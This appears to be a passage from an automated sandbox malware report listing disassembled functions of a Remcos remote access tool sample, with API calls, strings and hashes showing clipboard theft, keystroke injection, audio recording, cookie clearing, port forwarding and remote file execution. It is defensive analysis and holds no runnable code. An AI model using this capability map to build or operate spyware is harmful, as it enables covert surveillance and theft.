                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                    • String ID: C
                                                                                                                                                    • API String ID: 1679612858-1037565863
                                                                                                                                                    • Opcode ID: 9caf102036446778c367e133031cf6f0cacfa942edfa2fdf4d5c8c9a8c4ba482
                                                                                                                                                    • Instruction ID: 8657e7aa814a6b0ff31084503c3089709d57606c8bb72c73bef3a2d3d8e6b53d
                                                                                                                                                    • Opcode Fuzzy Hash: 9caf102036446778c367e133031cf6f0cacfa942edfa2fdf4d5c8c9a8c4ba482
                                                                                                                                                    • Instruction Fuzzy Hash: 21B11875A0121ADBDB24DF18CC84A9DB7B5FF58304F5086EAD84AA7750E770AE90CF84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: tcp$udp
                                                                                                                                                    • API String ID: 0-3725065008
                                                                                                                                                    • Opcode ID: 06ab0e4d2f9a821bf71a50e805e7a67e19bc91d00107c3b2fcdeb08902b4dd54
                                                                                                                                                    • Instruction ID: b174e86e5d63fb1c047fd884f945d2eb735112be6a42100ad2993b0d54cffb44
                                                                                                                                                    • Opcode Fuzzy Hash: 06ab0e4d2f9a821bf71a50e805e7a67e19bc91d00107c3b2fcdeb08902b4dd54
                                                                                                                                                    • Instruction Fuzzy Hash: 8D717670A093438FD718CE14C580B2ABBE5FF88356F00492EF89687658EB76D944CBD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEBD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,02DEC047,?,?,00000000,00000000), ref: 02DEBDB2
                                                                                                                                                      • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                    • Opcode ID: 8e6e5ae096b7c4fa0a8d75f9d15a20ec7f22775e044f41647b08c426bf24fee1
                                                                                                                                                    • Instruction ID: ff6d325943eb8d4d50b597363bb783fd85b0b79015fa83551d613b5654cd4742
                                                                                                                                                    • Opcode Fuzzy Hash: 8e6e5ae096b7c4fa0a8d75f9d15a20ec7f22775e044f41647b08c426bf24fee1
                                                                                                                                                    • Instruction Fuzzy Hash: 0A613E35B402899BDF01FBA4D891B9F77B7EB88300F619436E1039B385DA35DD068BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156914F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Eventinet_ntoa
                                                                                                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                                                    • API String ID: 3578746661-168337528
                                                                                                                                                    • Opcode ID: 5466c89ab892671f0a17b26b268ed42f3236bd5f6bce3b66de4c7b2cab9c5d26
                                                                                                                                                    • Instruction ID: a9b6a3d88de1f0e2d1cc034f9e99d9a3d9f27f1fae60aa9f9698ebb2c08aaf03
                                                                                                                                                    • Opcode Fuzzy Hash: 5466c89ab892671f0a17b26b268ed42f3236bd5f6bce3b66de4c7b2cab9c5d26
                                                                                                                                                    • Instruction Fuzzy Hash: 9851D739F05358DFC708EB38CC65A6E37A9AB80240F50051EE5028B6E0DF74B905CBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15697CDF Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15697F2C: __EH_prolog.LIBCMT ref: 15697F31
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,156E60A4), ref: 15697DDC
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 15697DE5
                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 15697DF4
                                                                                                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 15697DA8
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                    • String ID: <$@$Temp
                                                                                                                                                    • API String ID: 1704390241-1032778388
                                                                                                                                                    • Opcode ID: 6406ee1012a2441438d29406b5f949f999c74377da49cf434b2faa7ccc0a1890
                                                                                                                                                    • Instruction ID: a0b5d87adb1f95d58881836e37cdf3c958e8ef9a05ee05fbdc1608c501621ab8
                                                                                                                                                    • Opcode Fuzzy Hash: 6406ee1012a2441438d29406b5f949f999c74377da49cf434b2faa7ccc0a1890
                                                                                                                                                    • Instruction Fuzzy Hash: 9A41BC35E023199BCB18EBA0DC55AFEB779AF10314F400268E506661D0EF743E8ACBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15687963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,156F4EE0,156E5FA4,?,00000000,15687FFC,00000000), ref: 156879C5
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,15687FFC,00000000,?,?,0000000A,00000000), ref: 15687A0D
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,15687FFC,00000000,?,?,0000000A,00000000), ref: 15687A4D
                                                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 15687A6A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 15687A95
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 15687AA5
                                                                                                                                                      • Part of subcall function 15684B96: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,156F4EF8,15684C49,00000000,00000000,00000000,00000000,156F4EF8,15684AC9), ref: 15684BA5
                                                                                                                                                      • Part of subcall function 15684B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,1568548B), ref: 15684BC3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                    • String ID: .part
                                                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                                                    • Opcode ID: 7ba74bf62633a8c3be7b4f2184a7a3c79dbb657954c2e5e9696704f81219aa2d
                                                                                                                                                    • Instruction ID: eb187502a51efcbf834dd6e014c0e43d32766cc949b51cad80a95577d161343c
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba74bf62633a8c3be7b4f2184a7a3c79dbb657954c2e5e9696704f81219aa2d
                                                                                                                                                    • Instruction Fuzzy Hash: A131AD75609355AFC310DF20C88499BB7ECFF94655F004A1DF98A92180EF75BA48CBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AllocConsole.KERNEL32(156F5338), ref: 1569CDA4
                                                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 1569CDAA
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 1569CDBD
                                                                                                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 1569CDE2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Console$Window$AllocOutputShow
                                                                                                                                                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                                                                                                                    • API String ID: 4067487056-3065609815
                                                                                                                                                    • Opcode ID: a69f05ceab8b0400be99538adff98d9c20555762a92d02a728aad1d89e02a62e
                                                                                                                                                    • Instruction ID: 79773a9877f4f1b042f6b6f7b89238236a11404ddeb5df79989c4a09ba5f099f
                                                                                                                                                    • Opcode Fuzzy Hash: a69f05ceab8b0400be99538adff98d9c20555762a92d02a728aad1d89e02a62e
                                                                                                                                                    • Instruction Fuzzy Hash: D20171B5A9330C6AEB10E7F0CC49F8D77ACEB04601F500555BA04A7185EB75B618C7F5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8,?,?,02E0B7A8,02DE6575,02E0A305), ref: 02DE4359
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8,?,?,02E0B7A8,02DE6575,02E0A305), ref: 02DE435F
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,02DE43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?,02E447C8), ref: 02DE4374
                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,02DE43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DE43E7,?,?), ref: 02DE437A
                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DE4398
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                    • Opcode ID: 119bfd6706ac9c7e0aabe22058b3af31a18eef0cdf6ce95a40aaf365b0b9a4b8
                                                                                                                                                    • Instruction ID: 8cf2512ea16deadff9403c8887a979fed947e09b75d4b1fbfb8ab9bd44a4938a
                                                                                                                                                    • Opcode Fuzzy Hash: 119bfd6706ac9c7e0aabe22058b3af31a18eef0cdf6ce95a40aaf365b0b9a4b8
                                                                                                                                                    • Instruction Fuzzy Hash: FAF0CD60EC0340B8FE21B2A1BC46F5A278DAB41B15F508B08BB6A942C087B0ACC59736
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CAC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,156BEA24,156BEA24,?,?,?,156CAE9A,00000001,00000001,73E85006), ref: 156CACA3
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 156CACDB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,156CAE9A,00000001,00000001,73E85006,?,?,?), ref: 156CAD29
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 156CADC0
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 156CAE23
                                                                                                                                                    • __freea.LIBCMT ref: 156CAE30
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    • __freea.LIBCMT ref: 156CAE39
                                                                                                                                                    • __freea.LIBCMT ref: 156CAE5E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597970681-0
                                                                                                                                                    • Opcode ID: 0c05d9fc054ba7879e6766aa6d21693c3927077e10afd6771da5d0950f674046
                                                                                                                                                    • Instruction ID: c2ce68120f148559f8a80a6d9182f41af11ac1dc14deeb7c8984910c72d93ff9
                                                                                                                                                    • Opcode Fuzzy Hash: 0c05d9fc054ba7879e6766aa6d21693c3927077e10afd6771da5d0950f674046
                                                                                                                                                    • Instruction Fuzzy Hash: F451F072B01216AFDB258F64CC80EAF77AAEB49660F1146A9FD05D7150EBB4EC40D7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15699993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 156999CC
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 156999ED
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A0D
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A21
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 15699A37
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 15699A54
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 15699A6F
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 15699A8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InputSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3431551938-0
                                                                                                                                                    • Opcode ID: 967b98528e9c629025ab33cb1631151d545383275be0e2cf1cd460d5ea334d80
                                                                                                                                                    • Instruction ID: dd9032a761af103c7f2bad5d01a9403f7d33a1a534900b73c6b2a9f579fb57fe
                                                                                                                                                    • Opcode Fuzzy Hash: 967b98528e9c629025ab33cb1631151d545383275be0e2cf1cd460d5ea334d80
                                                                                                                                                    • Instruction Fuzzy Hash: 6931833195834A6EE301CF51D941FEBBBDCEF89B54F04080EF6809A181D7A295C98B97
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15696940 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32 ref: 15696941
                                                                                                                                                    • EmptyClipboard.USER32 ref: 1569694F
                                                                                                                                                    • CloseClipboard.USER32 ref: 15696955
                                                                                                                                                    • OpenClipboard.USER32 ref: 1569695C
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 1569696C
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 15696975
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1569697E
                                                                                                                                                    • CloseClipboard.USER32 ref: 15696984
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2172192267-0
                                                                                                                                                    • Opcode ID: 3778d135be671458cb53d2682b815207feed5282ba9ce4e1e4ff6bc5b354b341
                                                                                                                                                    • Instruction ID: 5cdfe755f34742412c4a59897ac4a5170e3c22ea994d5ecaa106efbcab15ec55
                                                                                                                                                    • Opcode Fuzzy Hash: 3778d135be671458cb53d2682b815207feed5282ba9ce4e1e4ff6bc5b354b341
                                                                                                                                                    • Instruction Fuzzy Hash: 37017C353253149FC718AB70CC9CAAE77AABF94A21F81082DEC8782580DF35A804C6E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CB3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,156CBB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 156CB3FE
                                                                                                                                                    • __fassign.LIBCMT ref: 156CB479
                                                                                                                                                    • __fassign.LIBCMT ref: 156CB494
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 156CB4BA
                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,156CBB31,00000000,?,?,?,?,?,?,?,?,?,156CBB31,?), ref: 156CB4D9
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,156CBB31,00000000,?,?,?,?,?,?,?,?,?,156CBB31,?), ref: 156CB512
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                    • Opcode ID: 627545771e2fc733f451f0dd9b66635e36f51eb95c345cb621d58ca7b8f8d86d
                                                                                                                                                    • Instruction ID: db728307a7c700cd08d4545e10879c45b4b8058473d568274e7faa8d8736bc7c
                                                                                                                                                    • Opcode Fuzzy Hash: 627545771e2fc733f451f0dd9b66635e36f51eb95c345cb621d58ca7b8f8d86d
                                                                                                                                                    • Instruction Fuzzy Hash: 5151C270E04249AFCB10CFA8C890ADEBBF8FF09310F50459AE955E7291D730A944CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15681D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strftime.LIBCMT ref: 15681D50
                                                                                                                                                      • Part of subcall function 15681A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 15681AD9
                                                                                                                                                    • waveInUnprepareHeader.WINMM(156F2A88,00000020,00000000,?), ref: 15681E02
                                                                                                                                                    • waveInPrepareHeader.WINMM(156F2A88,00000020), ref: 15681E40
                                                                                                                                                    • waveInAddBuffer.WINMM(156F2A88,00000020), ref: 15681E4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                                                    • API String ID: 3809562944-3597965672
                                                                                                                                                    • Opcode ID: 5f75dc5b4bca2116528a1958ab987e6ad7b6b0d1acbcfe888e81886eb342402f
                                                                                                                                                    • Instruction ID: ff386050c3f359f4a1aff5717794f890ef3f0cdabe24093b9c4db93871ff9487
                                                                                                                                                    • Opcode Fuzzy Hash: 5f75dc5b4bca2116528a1958ab987e6ad7b6b0d1acbcfe888e81886eb342402f
                                                                                                                                                    • Instruction Fuzzy Hash: 62316275A19315DFC324DB24CCA4AAE77E9BB54210F40491EE14993290EF30B919CFEA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156935A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
                                                                                                                                                      • Part of subcall function 156935A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
                                                                                                                                                      • Part of subcall function 156935A6: RegCloseKey.ADVAPI32(?), ref: 156935F2
                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 1568BF6B
                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 1568BF78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                                                    • Opcode ID: 81469cd28ea4e1a68f1d360d4a10b7200002624d4f61051f0d061ef8da181d4f
                                                                                                                                                    • Instruction ID: c5bb8c20b354ebbe0f1cc5cc1860158a0ef34b8f367f03d6d58eaad24b6e3913
                                                                                                                                                    • Opcode Fuzzy Hash: 81469cd28ea4e1a68f1d360d4a10b7200002624d4f61051f0d061ef8da181d4f
